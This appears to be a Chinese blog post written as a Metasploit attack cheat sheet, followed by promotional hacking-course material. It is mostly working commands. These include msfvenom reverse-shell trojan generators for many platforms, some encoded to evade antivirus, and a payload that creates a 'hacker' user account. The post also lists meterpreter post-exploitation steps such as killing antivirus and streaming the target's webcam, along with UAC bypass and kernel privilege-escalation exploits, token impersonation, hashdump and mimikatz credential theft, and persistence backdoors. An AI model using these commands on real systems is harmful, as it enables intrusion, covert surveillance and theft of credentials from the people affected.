模块含义
auxiliary:主要包含渗透测试中一些辅助性脚本,这些脚本功能有扫描,嗅探,破解,注入,漏洞挖掘等。
encoders:编码工具,用于躲过入侵检测和过滤系统。
exploit:主要包括了 exp、0day、各种漏洞利用的脚本。主要的攻击代码全在这个目录下,这里边包括的 exp 的路径的命名规则是:系统/服务/模块,在使用的exp 是可以根据这个命名方法来找(也可以用 search 这条指令来找)。比如: use exploites/windows(系统)/vnc(服务)/realvnc_client(模块名)
payload:攻击载荷,是攻击者发送给系统执行的指令的。payload主要是在目标机执行的,exploits是在本地执行作用于目标机。
post:该目录存放exploits执行成功后,向目标机发送的一些功能性指令,如:提权、获取hash等。
常用命令
search //搜索 use+编号 //利用 show options //查看参数 info //展示出指定渗透攻击或模块的相关信息 set //设置参数 run //执行 back //退出当前模块常用载荷使用(不强调大小写)
RHOSTS //对方ip LHOSTS //自己ip RPORT //端口,一般默认的就行 VERBOSE //打印输出,显示当前在干什么 STOP_ON_SUCCESS //破解成功后停止操作 USER_FILE //接用户名字典 PASS_FILE //接密码字典ssh
search ssh_logmysql
大概意思同上
攻击
在本地环境使用samba进行攻击会出现这个
原因是Windows是中文的,要英文版即可
远程的不管是否能行试一下就可以
生成木马
windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe msfvenom -p windows/meterpreter/bind_tcp LPORT=<Attack Port> -f dll >/root/bind_xx.dll msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST=192.168.134.131 LPORT=8899 RC4PASSWORD=admin123456qqq -f dll -o ~/y.dll msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.4 lport=1212 -e x86/shikata_ga_nai -i 5 -f c > t.c msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.133.132 lport=1212 -e x86/shikata_ga_nai -i 5 -f raw > test.c msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=3333 -f raw -o shellcode.raw msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex LHOST=192.168.134.131 LPORT=4444 -o msf.txt安卓app
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -o ~/Desktop/test2.apkLinux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f elf > shell.elf msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=34.92.252.2 LPORT=10053 -f elf > cloud msfvenom -p linux/x64/meterpreter_reverse_https LHOST=192.168.134.131 LPORT=6666 -f elf > shell msfvenom -p cmd/unix/reverse_bash lhost=34.92.252.2 lport=10001 RMac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f macho > shell.machoPHP:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.phpASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f asp > shell.aspASPX:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f aspx > shell.aspxJSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.85.130 LPORT=6666 -f raw > shell.jspBash:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.85.130 LPORT=6666 -f raw > shell.shPerl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.85.130 LPORT=6666 -f raw > shell.plPython
msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.85.130 LPORT=6666 -f raw > shell.pyjava
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 W > text.jarwar
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=端口 -f war > shell.war msfvenom -p java/meterpreter/reverse_http LHOST=ip LPORT=端口 -f war > shell.warpowershell
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -f psh > shell.ps1 powershell.exe -ExecutionPolicy Bypass -File shell.ps1Create User
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe大致步骤
在攻击机上开启监听
use exploit/multi/handler上面生成的马开启的是哪个就设置哪个
开启监听并在目标机上运行木马
反弹成功后常用命令
进程迁移
ps //查看目标机正在运行的进程 getpid //查看当前进程 migrate N//迁移进程,N为PID号,有些可能会迁移失败多试几个 run post/windows/manage/migrate //自动迁移进程 kill N //强制结束进程,N为PID号进程迁移后原先的进程会自动销毁,如果没有销毁则使用kill强制杀掉
meterpreter命令
sysinfo //查看目标系统命令 run post/windows/gather/checkvm //查看是否运行在虚拟机上 route //查看网络设置 run post/windows/manage/killav //关闭杀毒软件 background //把当前会话放入后台,会给出个session值,回到会话参照图一,任何地方都是可以回去的 getuid //查看当前用户 run post/windows/manage/enable_rdp //开启远程桌面 run post/multi/manage/autoroute //自动添加路由 route add 0.0.0.0 0.0.0.0 4 //手动添加路由(全网段),4表示session值 见图三 route print // 查看已添加对的路由 见图三 run post/windows/gather/enum_applications //目标机上的应用程序 run post/windows/gather/credentials/windows_autologin //抓取自动登录的用户名和密码,一般不行 load espia //加载Espia插件 screengrab //抓取目标机的屏幕截图,先加载Espia再用此命令 screenshare //实时显示目标机屏幕 webcam_list //查看目标机有无摄像头 webcam_snap //抓取照片 webcam_stream //摄像头直播 shell //进入目标机shell exit //返回 pwd //查看当前处于目标机哪个目录 cd C:\\Users\\华扬\\Desktop 切换目录,当然也可以加转义字符 search -f *.txt -d C:\\Users\\华扬\\Desktop //搜索文件,要搜索整台电脑search -f *.txt即可 download C:\\Users\\华扬\\Desktop\\新建文本文档.txt /root //下载目标文件 upload /home/huayang/123.exe C:\\Users\\华扬\\Desktop //上传文件到目标机器图一
图二
图三
提权
相关命令
chcp 65001 //在shell下执行以防止乱码getsystem提权
可能性较低,可以试一下
getsystembypassuac
search bypassuac /下面的项目都是可以用于提权的exploit/windows/local/bypassuac //成功率最高 exploit/windows/local/bypassuac_eventvwr //成功率最高 windows/local/bypassuac_vbs//成功较高 exploit/windows/local/bypassuac_injection //针对x86 exploit/windows/local/bypassuac_comhijack//针对x86 windows/local/ask exploit/windows/local/bypassuac_sdclt //强烈不建议使用 exploit/windows/local/bypassuac_dotnet_profiler//强烈不建议使用提权并不是马上成功,后面还需要加上getsystem
内核提权
方法一
run post/windows/gather/enum_patches //查询已安装的补丁 use post/multi/recon/local_exploit_suggester //查询可使用漏洞,结果可信度较低,不妨一试查询的补丁如msf没有可在github下载
https://github.com/SecWiki/windows-kernel-exploits
方法二
用systeminfo查看安装了哪些补丁
然后再在下表对应版本找哪些补丁没有安装,搜索编号攻击即可
CVE-2021-1732 [Windows Win32k 提权漏洞] (Windows 10, 2019/20H2) CVE-2020-0787【Windows后台智能传输服务提权漏洞】(Windows 7/8/10、2008/2012/2016/2019) CVE-2020-0796 [Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在一个远程代码执行漏洞,即“Windows SMBv3 客户端/服务器远程代码执行漏洞”] (Windows 1903/1909 ) CVE-2019-1458 [当Win32k组件无法正确处理内存中的对象时,Windows中存在一个特权提升漏洞](Windows 7/8/10/2008/2012/2016) CVE-2019-0803 [Win32k 组件无法正确处理内存中的对象时,Windows 中存在提权漏洞] (Windows 7/8/10/2008/2012/2016/2019) CVE-2018-8639 [Win32k 组件无法正确处理内存中的对象时,Windows 中存在提权漏洞] (Windows 7/8/10/2008/2012/2016) CVE-2018-1038 [Windows 内核提权漏洞](Windows 7 SP1/Windows Server 2008 R2 SP1) CVE-2018-0743 [Windows Subsystem for Linux Elevation of Privilege Vulnerability](Windows 10 版本 1703/Windows 10 版本 1709/Windows Server 版本 1709) CVE-2018-8453 [Windows Win32k 组件中的提权漏洞] (>= windows 8.1) CVE-2018-8440 [Windows ALPC 提权漏洞] (windows 7/8.1/10/2008/2012/2016) MS17-017 [KB4013081] [GDI 调色板对象本地权限提升](Windows 7/8) CVE-2017-8464 [LNK远程执行代码漏洞](Windows 10 / 8.1 / 7/2016/2010/2008) CVE-2017-0213 [Windows COM 提权漏洞] (windows 10/8.1/7/2016/2010/2008) CVE-2018-0833 [SMBv3 空指针取消引用拒绝服务] (Windows 8.1/Server 2012 R2) CVE-2018-8120 [Win32k 提权漏洞] (Windows 7 SP1/2008 SP2,2008 R2 SP1) MS17-010 [KB4013389] [Windows 内核模式驱动程序] (windows 7/2008/2003/XP) MS16-135 [KB3199135] [Windows 内核模式驱动程序] (2016) MS16-111 [KB3186973] [内核 API] (Windows 10 10586 (32/64)/8.1) MS16-098 [KB3178466] [内核驱动程序] (Win 8.1) MS16-075 [KB3164038] [热土豆] (2003/2008/7/8/2012) MS16-034 [KB3143145] [内核驱动程序] (2008/7/8/10/2012) MS16-032 [KB3143141] [辅助登录句柄] (2008/7/8/10/2012) MS16-016 [KB3136041] [WebDAV] (2008/Vista/7) MS16-014 [K3134228] [远程代码执行] (2008/Vista/7) MS15-097 [KB3089656] [远程代码执行] (win8.1/2012) MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012) MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012) MS15-061 [KB3057839] [内核驱动程序] (2003/2008/7/8/2012) MS15-051 [KB3057191] [Windows内核模式驱动程序](2003/2008/7/8/2012) MS15-015 [KB3031432] [内核驱动程序] (Win7/8/8.1/2012/RT/2012 R2/2008 R2) MS15-010 [KB3036220] [内核驱动程序] (2003/2008/7/8) MS15-001 [KB3023266] [内核驱动程序] (2008/2012/7/8) MS14-070 [KB2989935] [内核驱动程序] (2003) MS14-068 [KB3011780] [域权限提升] (2003/2008/2012/7/8) MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8) MS14-066 [KB2992611] [Windows Schannel 允许远程代码执行] (VistaSP2/7 SP1/8/Windows 8.1/2003 SP2/2008 SP2/2008 R2 SP1/2012/2012 R2/Windows RT/Windows RT 8.1) MS14-040 [KB2975684] [AFD 驱动程序] (2003/2008/2012/7/8) MS14-002 [KB2914368] [NDProxy] (2003/XP) MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7) MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7) MS13-005 [KB2778930] [内核模式驱动程序] (2003/2008/2012/win7/8) MS12-042 [KB2972621] [服务总线] (2008/2012/win7) MS12-020 [KB2671387] [RDP] (2003/2008/7/XP) MS11-080 [KB2592799] [AFD.sys] (2003/XP) MS11-062 [KB2566454] [NDISTAPI] (2003/XP) MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP) MS11-011 [KB2393802] [内核驱动程序] (2003/2008/7/XP/Vista) MS10-092 [KB2305420] [任务计划程序] (2008/7) MS10-065 [KB2267960] [FastCGI](IIS 5.1、6.0、7.0 和 7.5) MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista) MS10-048 [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7) MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP) MS10-012 [KB971468] [SMB 客户端 Trans2 堆栈溢出] (Windows 7/2008R2) MS09-050 [KB975517] [远程代码执行] (2008/Vista) MS09-020 [KB970483] [IIS 6.0](IIS 5.1 和 6.0) MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista) MS08-068 [KB957097] [远程代码执行] (2000/XP) MS08-067 [KB958644] [远程代码执行] (Windows 2000/XP/Server 2003/Vista/Server 2008) MS08-066 [KB956803] [AFD.sys] (Windows 2000/XP/Server 2003) MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista) MS06-040 [KB921883] [远程代码执行] (2003/xp/2000) MS05-039 [KB899588] [PnP 服务] (Win 9X/ME/NT/2000/XP/2003) MS03-026 [KB823980] [RPC接口中的缓冲区溢出](/ NT / 2000 / XP / 2003)https://github.com/SecWiki/windows-kernel-exploits
令牌窃取
基础知识
令牌(Token)就是系统的临时秘钥,相当于账户名和密码,用来决定是否允许这次请求和判断这次请求是属于那个用户的。他允许你在不提供密码或其他凭证的前提下,访问网络和系统资源
相关命令
use incognito //加载模块 list_tokens -u //列出可用的token,先加载模块才可以使用这个 impersonate_token + token //伪造令牌,token记得使用\\实战利用
用win7和winsever2012在普通用户下都只有一个token
其实令牌的数量取决于shell的访问级别也就是获取的权限
当我提权为system级别时,多出来三个令牌
实战中可能有些普通用户有高权限令牌,不然怎么叫提权呢
这里为了实验就只能将就一下了
我们现在拥有的是system权限
我们就用此方法降权试试看,
原理都是相同的,只要有令牌正反都可试试看
降为user权限,也就是WIN-GT4B41U3H8D\华扬
一系列操作过后发现可行,感觉此方法多用于降权使用
注意:在输入tooken是记得要输入双反斜杠(\)
Hash攻击
基础命令
hashdump //导出目标机sam的hash值 run post/windows/gather/smart_hashdump //更为强大的导出目标机sam的hash值实战利用
hash模块
这条命令需要管理员权限和管理员权限的进程才能使用
我现在是管理员权限依旧报错
同时还需要管理员权限的进程才可以使用,很很显然我们现在的是普通用户的运行程序
找到含有system权限的进程,我们在system权限下把进程迁入2304这个进程
成功拿到hash值
格式为
用户名称: RID:LM-HASH 值: NT-HASH 值,rid 是 windows 系统账户对应固定的值,类似于 linux 的 uid,gid 号,500 为 administrator,501 为 guest 等。而 lm 的 hash 和 nt 的 hash,他们都是对用户密码进行的加密,只不过加密方式不一样。复制其中一种加密的 hash 可以直接使用在线 cmd5 破解smart_hashdump
相较于hashdump smart_hashdump则更加强大
不需要system进程,还不会乱码
win7以上的系统还需要绕过UAC也就是还是要system下才能运行
其中这个解出来就为管理员密码
QuarksPwDump
拿到shell后我们需要把文件传到目标机
现在我们是低权限,不能随便传目录
只有传送users目录下的用户
不知道用户名怎么办?
我们先cd c:\users再ls看看即可
知道了用户名我们最好传入文档里(记得是两个反斜杠\),也就是C:\Users\华扬\Documents
经过测试这种方法只能使用windows xp系统
xp随便传入哪里都不需要使用管理用户,所以我们就直接传入xp的c盘
kiwi模块(也就是老版本的mimikatz)
基础命令
load kiwi //开启模块 creds_all //获取密码 kiwi_cmd sekurlsa::logonpasswords //获取密码实战
这个必须要system权限才能使用,所以也没啥用
移植漏洞利用代码模块
这里以永恒之蓝为例
地址:https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/
权限维持
Persistence模块
run prsistence -A -S -U -i 10 -p 2333 -r 172.16.181.8 A:自动启动payload程序 S:系统启动时加载 U:用户登录时自动启动 i:回连的时间间隔 p:监听反向连接端口号 r:目标机器IP地址本地测试未果
使用成功会返还一个session
Metsvc 模块
run metsvc -A会在目标机器上开一个服务
监听31337端口利用handler下的windows/metsvc_bind_tcp模块,重新获得shell
本地实验还是失败,不知道为啥会死亡
免费福利
黑客/网络安全学习路线
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
网络安全学习资源分享:
下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!
一、2025最新网络安全学习路线
一个明确的学习路线可以帮助新人了解从哪里开始,按照什么顺序学习,以及需要掌握哪些知识点。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
**读者福利 |**【CSDN大礼包】最新网络安全/网安技术资料包~282G!无偿分享!!!**(安全链接,放心点击)**!
网络安全的知识多而杂,怎么科学合理安排?
下面给大家总结了一套适用于网安零基础的学习路线,应届生和转行人员都适用,学完保底6k!就算你底子差,如果能趁着网安良好的发展势头不断学习,日后跳槽大厂、拿到百万年薪也不是不可能!
初级网工
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k
到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?
【“脚本小子”成长进阶资源领取】
7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.
零基础入门,建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习; 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime; ·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完; ·用Python编写漏洞的exp,然后写一个简单的网络爬虫; ·PHP基本语法学习并书写一个简单的博客系统; 熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选); ·了解Bootstrap的布局或者CSS。
8、超级网工
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,贴一个大概的路线。感兴趣的童鞋可以研究一下,不懂得地方可以【点这里】加我耗油,跟我学习交流一下。
网络安全工程师企业级学习路线
如图片过大被平台压缩导致看不清的话,可以【点这里】加我耗油发给你,大家也可以一起学习交流一下。
一些我自己买的、其他平台白嫖不到的视频教程:
需要的话可以扫描下方卡片加我耗油发给你(都是无偿分享的),大家也可以一起学习交流一下。
网络安全学习路线&学习资源![]()
结语
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
特别声明:
此教程为纯技术分享!本书的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失!!!
